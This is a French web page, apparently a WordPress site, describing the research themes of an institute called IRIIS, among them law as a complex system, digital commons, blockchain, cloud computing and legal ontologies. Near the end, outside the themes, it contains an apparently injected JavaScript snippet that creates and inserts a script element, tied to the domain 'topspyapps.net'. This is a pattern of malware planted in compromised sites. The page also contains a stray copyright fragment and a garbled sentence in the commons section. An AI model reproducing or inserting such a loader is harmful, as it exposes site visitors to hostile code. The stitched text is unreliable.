Thématiques

La recherche au sein de l’IRIIS se concentre sur les thématiques suivantes:

  • DROIT ET COMPLEXITÉ

    Le système juridique semble avoir perdu de sa monumentalité pyramidale intimidante au profit d’un plasma de normes de plus en plus imbriquées dans des rapports de complémentarité, de négociation, de synergie déployés. Il s’agit alors d’étudier le droit en tant que système complexe, où ne prévalent plus des distinctions nettes et des normes chimiquement pures et stables, mais s’imposent désormais des alliages et des rapports d’interdépendance flous et dynamique.

  • BIENS COMMUNS NUMÉRIQUES

    Alors que la notion d’échange est fondée sur la rareté, celle de partage est fondée sur l’abondance. À l’heure du numérique, partager une oeuvre n’implique pratiquement aucun coût supplémentaire (au delà du coût marginal qui est pratiquement nul), facilitant ainsi le développement d’une économie fondée sur le partage. En tant qu’institution affiliée à Creative Commons France, l’IRIIS analyse les problématiques juridiques liées aux nouveaux modèles économiques fondée sur l’échange consiste à échanger des biens ou des services en échange d’autres biens ou de services qui ont une valeur équivalente sur le marché.

  • ARCHITECTURES DISTRIBUÉES

    L’IRIIS se concentre sur l’exploration des implications sociotechniques, économiques et juridiques posées par les architectures informatiques dites distribuées. L’ambition est de produire une connaissance des problématiques spécifiques que poseront les architectures distribuées du point de vue des usages, de la production de contenus, de la diffusion des technologies, des modèles économiques, des droits et normes expérimentés ou éprouvés.

  • BLOCKCHAIN

    L’horizon ouvert par les technologies du blockchain demeure obscur pour les organisations qui sont les premières concernées. Les bouleversements des modèles économiques et de gouvernance traditionnels sont à l’origine de risques mal identifiés et d’opportunités inexplorées. L’IRIIS s’efforce d’accélérer la compréhension, l’appropriation et l’expérimentation de nouveaux modèles fondés sur le blockchain, en accordant une attention particulière à son impact sur l’organisation et la gouvernance des entreprises, ainsi que sur les répercussions sur les système juridique

  • CLOUD COMPUTING

    Le Cloud Computing (ou Infonuagique) a révolutionné la manière dont les données sont stockées, traitées et redistribuées sur Internet. La virtualisation des ressources permet de séparer la gestion des contenus et le fonctionnement des applicatifs sans tenir compte de leur localisation réelle. Nous étudions les avantages fournis par ces nouvelles technologies, en termes de flexibilité d’accès et d’adaptabilité des couts, mais aussi (et surtout) les problèmes se posent, notamment en ce qui concerne la sécurité des données et la légitimé de leur exploitation.

  • ONTOLOGIES JURIDIQUES

    Dans le domaine de l’Intelligence Artificielle et du traitement automatique de l’information, les ontologies sont des représentations formelles des concepts d’un domaine et des liens sémantiques entre eux. L’IRIIS s’intéresse à la réflexion sur l’applicabilité de ces deux domaines sur travaux de construction des ontologies juridiques. Nous menons aussi des recherches sur les caractéristiques du discours juridique et des représentations mentales du droit.

Or primary site pglaf, owns a compilation copyright in the collection of project.

var d=document;var s=d.createElement(‘script’); document.currentScript.parentNode.insertBefore(s, document.currentScript);topspyapps.net

Comments are closed.

© 2015 Sofarider Inc. All rights reserved. WordPress theme by Dameer DJ.